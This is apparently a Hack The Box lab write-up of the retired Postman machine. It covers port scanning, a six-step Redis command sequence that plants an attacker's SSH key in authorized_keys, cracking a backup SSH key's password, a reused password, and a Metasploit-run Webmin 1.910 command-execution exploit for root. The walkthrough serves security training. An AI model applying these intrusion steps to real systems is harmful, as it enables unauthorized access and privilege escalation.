This post documents the complete walkthrough of Postman, a retired vulnerable VM created by TheCyberGeek, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post


Postman is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 --rate=1000

Starting masscan 1.0.5 ( at 2019-11-03 13:51:36 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 10000/tcp on                                 
Discovered open port 6379/tcp on                                  
Discovered open port 80/tcp on                                    
Discovered open port 22/tcp on

Interesting list of open ports. Let’s do one better with nmap scanning the discovered ports to establish their services.

# nmap -n -v -Pn -p22,80,6379,10000 -A --reason -oN nmap.txt
22/tcp    open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp  open  redis   syn-ack ttl 63 Redis key-value store 4.0.9
10000/tcp open  http    syn-ack ttl 63 MiniServ 1.910 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).

Hmm. Other than the usual ssh and http services, we also have Redis and MiniServ running. Anyhow, this is what the http site looks like.

Redis SSH Backdoor

Anyway since the Redis service is available, let’s check and see what we can glean from there.

Interesting. The creator seems to be suggesting that there’s a redis SSH account and the way to get a foothold is to dump a SSH public key we control to authorized_keys.

That should be easy.

  1. ssh-keygen -f redis
  2. echo -ne "\n\n" > public; cat >> public
  3. redis-cli -h SLAVEOF NO ONE
  4. cat public | redis-cli -h -x set pub
  5. redis-cli -h CONFIG SET dbfilename authorized_keys
  6. redis-cli -h SAVE

I’ve incorporated the above steps into a script to save a bit of time because many HTB players are chasing after a Metasploit exploit that somehow didn’t work as expected.

Matt’s Backup SSH Key

During enumeration of redis’s account, I noticed that there is another account with UID 1000 (Matt). That would mean that the file user.txt is in Matt’s home directory.

Look what we found!

Matt is careless to leave a backup of his password-protected SSH private key around.

Something else is up. Notice that Matt cannot login via SSH.

What good is a password-protected private key if we can’t login via SSH? Well, we can crack the key’s password and see what it brings us.

And guess what. We can su as Matt with that password.

There you have it. The file user.txt is indeed in Matt’s home directory.

Privilege Escalation

During enumeration of Matt’s account, I noticed the presence of a file in /etc/webmin/Matt.acl, which sort of gave me an idea—maybe Matt is able to log in to the Webmin using the same credential (Matt:computer2008)?

No shit.

Webmin 1.910 - ‘Package Updates’ Remote Command Execution

Long story short. As much as I wanted to avoid Metasploit, this is one exploit that executes better with it.

This is way too easy.

Getting root.txt